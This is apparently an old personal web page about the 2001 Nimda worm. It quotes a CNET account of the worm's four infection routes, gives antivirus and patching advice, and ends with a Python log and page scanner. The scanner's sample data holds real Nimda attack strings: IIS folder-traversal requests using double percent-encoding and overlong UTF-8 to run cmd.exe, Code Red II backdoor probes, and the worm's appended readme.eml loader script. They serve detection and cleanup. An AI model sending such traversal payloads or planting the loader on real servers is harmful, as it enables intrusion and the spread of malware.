A pernicious can of worms
Life on the Internet has been quite "interesting" over the past three months. First there was Sircam in July, then Code Red (with its Code Red II variant following in August), and then the Nimda worm, which struck on 18 September. A few weeks after the WTC tragedy, another worm (Vote), masquerading as an innocuous e-mail message, has begun to spread. Here is an excerpt from a September 21 article on CNET describing the workings of the Nimda worm.
-------begin excerpt--------
The Nimda worm hit so quickly, peaking within 6 hours, and caused so much havoc that accurate analysis of the worm has been delayed. (Note: almost half a million computers infected worldwide within a week's time.)
The latest information shows that the Nimda worm's extensive replacement of key files and programs on infected PCs and its use of Windows file sharing to spread across local area networks have made it difficult to clean out. For example, earlier in the week, antivirus software company Symantec originally classified removal of the Nimda worm as "easy," but 24 hours later it changed that evaluation.
Nimda, which is "admin" (short for administrator) spelled backwards, started spreading early Tuesday morning (18th) and quickly infected PCs and servers across the Internet. Also known as "readme.exe" and "W32.Nimda", the worm is the first to use four different methods to infect not only PCs running Windows 95/98/Me and 2000, but also servers running Windows 2000 and Windows NT.
The Nimda worm spreads by four different routes. The worm originally spread quickly by scanning local networks and the Internet for Web servers running Microsoft's Internet Information Server (IIS) software that were vulnerable to one of two well-known flaws.
First, if the server had already been compromised by the Code Red II worm, then Nimda used that backdoor to copy itself to the server as a file named "admin.dll." For all other IIS servers, the program attempted to use the "Web server folder traversal" vulnerability discovered in October 2000 to copy the file "admin.dll" to the server. Once the file is copied to the computer, the worm executes it and infects the new victim. On such servers, the worm creates a "guest" account with administrative privileges, copies itself to any network drives, makes the C: drive publicly accessible, and appends a script to HTM, HTML and ASP files. These files will attempt to upload a copy of the worm to the computer of anyone who views a Web page hosted by the infected computer using a browser with JavaScript enabled. The worm also deletes the keys in the system registry that set the security preferences for the computer and also causes itself to be run at start-up.
The ability to infect others through viewing a Web page is the Nimda worm's second path of infection. The snippet of JavaScript added to each Web file on an infected server will cause the worm, renamed "readme.eml", to upload from the server to the surfer's computer. The worm will run automatically on PCs using unpatched versions of Microsoft's Internet Explorer 5.5 SP1 or earlier. On any browser with JavaScript enabled, the worm's script will cause the browser to try to upload the code but will first ask the PC user's permission.
PCs can also be infected through the worm's third mode of transmission: e-mail. On infected computers, the Nimda worm runs its own mail service and sends e-mail to addresses in the Windows address book as well as to those culled from the machine's browser cache, which stores elements of recently viewed Web pages. The e-mail appears to have an attached WAV file, but in reality it uses an old MIME (multipurpose Internet mail extensions) vulnerability to automatically run the worm once the e-mail is viewed in the mail client's preview panel. Even on computers that are not vulnerable to the security flaw, the attachment causes the MS Outlook and Outlook Express e-mail programs to open a dialog box asking the user for permission to open the file. If the worm infects a PC through either the Web browser or e-mail, Nimda acts much like it does on servers. In addition, the worm adds a "load.exe" file to the Windows System directory, appends itself to many .exe, .eml and Word document files, and replaces common applications such as WordPad, WinZip32 and HyperTerminal with a copy that executes the worm. In addition, the worm places copies of "Riched20.dll", the program that is the workhorse text editor for Word, WordPad and other editing programs, in multiple places on every accessible hard drive. Whenever a program that uses Riched20.dll opens, it also executes the worm.
This ability to spread copies of itself throughout corporate networks by using shared drives is the fourth way the worm infects. Using the network-sharing mechanism, the Nimda worm spreads fast and makes extermination very difficult, said Vincent Gullotto, director of security software maker Network Associates' antivirus emergency response team. "While you are cleaning one area of the network, it is coming back behind you and reinfecting the computers," he said.
Network Associates, Symantec and other security companies have tools to help system administrators clean their systems. Microsoft has posted an extensive list of patches and advisories to combat the worm.
Analyses of the Nimda worm can be found at CERT, SecurityFocus.com, Neohapsis and most antivirus companies' Web sites.
---------end excerpt---------
To avoid falling prey to these pernicious pests, install a good antivirus scanning program. Keep its virus signature data updated: vendors ship new definitions far more often than new program versions, so fetch definitions at least every few weeks, immediately whenever a new worm is in the news, and never less than every other month (the more often the better). Use the scanner regularly, at boot-up and whenever you notice unusual program activity. Scanning alone would not have kept Nimda out, though: as the excerpt shows, it entered servers and PCs through IIS and Internet Explorer flaws for which patches already existed, so apply the vendor patches as well, and think twice about leaving JavaScript and the e-mail preview pane switched on while a new worm is loose. As they always say, "A gram of prevention is worth a kilogram of cure". The short time you spend on an antivirus scan and a patch run will go a long way toward protecting your valuable time, money and data.
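As an added example (not part of this page or of the CNET article), here is a small Python checker for the two server-side vectors the excerpt describes: the Code Red II backdoor probe and the IIS folder-traversal probe, as they appear in the web server log, and the script Nimda appended to hosted .htm/.html/.asp pages. The request strings and the appended script are the published Nimda ones (CERT advisory CA-2001-26); the log lines, client addresses, timestamps and the sample page are constructed for the example, and the lenient UTF-8 decoder is a simplified model of how the vulnerable IIS read overlong sequences, not Microsoft's code. The general lesson it shows is that a path must be checked only after every encoding layer (double percent-encoding, overlong UTF-8, backslashes) has been stripped away.

```python
# Added example: spot Nimda's server-side vectors on an IIS host (see lead-in).
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_to_bytes

# Constructed W3C-style IIS log lines (date time c-ip method uri-stem uri-query status).
# Request strings are Nimda / Code Red II probes; addresses and times are made up.
SAMPLE_LOG = """\
2001-09-18 13:02:11 10.0.0.7 GET /scripts/root.exe /c+dir 404
2001-09-18 13:02:11 10.0.0.7 GET /MSADC/root.exe /c+dir 404
2001-09-18 13:02:12 10.0.0.7 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:02:12 10.0.0.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:02:13 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:02:13 10.0.0.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:02:14 10.0.0.7 GET /scripts/..%%35%63../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:05:40 10.0.0.9 GET /index.htm - 200
2001-09-18 13:05:41 10.0.0.9 GET /images/logo.gif - 200
"""

def lenient_utf8_to_ascii(raw: bytes) -> bytes:
    """Fold a two-byte UTF-8 lead byte (0xC0-0xDF) with whatever byte follows,
    without validating it.  Simplified model (an assumption of this example) of
    the decoding that made IIS read %c0%af as '/' and %c1%1c as '\\'."""
    out, i = bytearray(), 0
    while i < len(raw):
        if 0xC0 <= raw[i] <= 0xDF and i + 1 < len(raw):
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return bytes(out)

def canonical_path(uri: str, rounds: int = 3) -> str:
    """Percent-decode until stable (catches %255c -> %5c -> '\\' and
    %%35%63 -> %5c -> '\\'), fold overlong UTF-8, then normalise '\\' to '/'."""
    data = uri.encode("latin-1", "replace")
    for _ in range(rounds):
        decoded = lenient_utf8_to_ascii(unquote_to_bytes(data))
        if decoded == data:
            break
        data = decoded
    return data.decode("latin-1").replace("\\", "/")

def escapes_root(path: str) -> bool:
    """True when a canonical path climbs above the web root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def classify_request(uri: str) -> Optional[str]:
    """Name the vector a request matches, or None for ordinary traffic."""
    path = canonical_path(uri).lower()
    base = path.rsplit("/", 1)[-1]
    if base == "root.exe":          # cmd.exe copy Code Red II left in /scripts and /MSADC
        return "codered2-backdoor"
    if escapes_root(path):          # the October 2000 folder-traversal flaw
        return "folder-traversal"
    if base == "cmd.exe":           # e.g. /c/winnt/... via a drive-root virtual directory
        return "cmd-exec"
    return None

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")

def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """(client ip, uri, vector) for every log line that matches a vector."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        tag = classify_request(m.group(5)) if m else None
        if tag:
            hits.append((m.group(3), m.group(5), tag))
    return hits

# The script Nimda appended to hosted pages opens readme.eml in an off-screen window.
NIMDA_SCRIPT_RE = re.compile(r"""window\.open\(\s*["']readme\.eml["']""", re.I)

# Constructed page carrying the appended copy, as CERT CA-2001-26 recorded it.
SAMPLE_HTML = ("<html><body><h1>Welcome</h1></body></html>\n"
               '<html><script language="JavaScript">window.open("readme.eml", null, '
               '"resizable=no,top=6000,left=6000")</script></html>')

def page_carries_nimda_script(html: str) -> bool:
    """True if a hosted page carries the appended Nimda loader script."""
    return NIMDA_SCRIPT_RE.search(html) is not None

if __name__ == "__main__":
    for ip, uri, tag in scan_log(SAMPLE_LOG):
        print(f"{ip:10} {tag:18} {uri}")
    print("page carries Nimda script:", page_carries_nimda_script(SAMPLE_HTML))
```

Run against a real IIS log, `scan_log` flags every client that probed for the Code Red II backdoor or tried to walk out of the web root, whichever encoding it used; `page_carries_nimda_script` is the check to run over every .htm, .html and .asp file on a server before declaring it clean, since a single page still carrying the script re-seeds visitors with JavaScript enabled.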
Happy computing :- )
P.S. Don't forget to back up important files.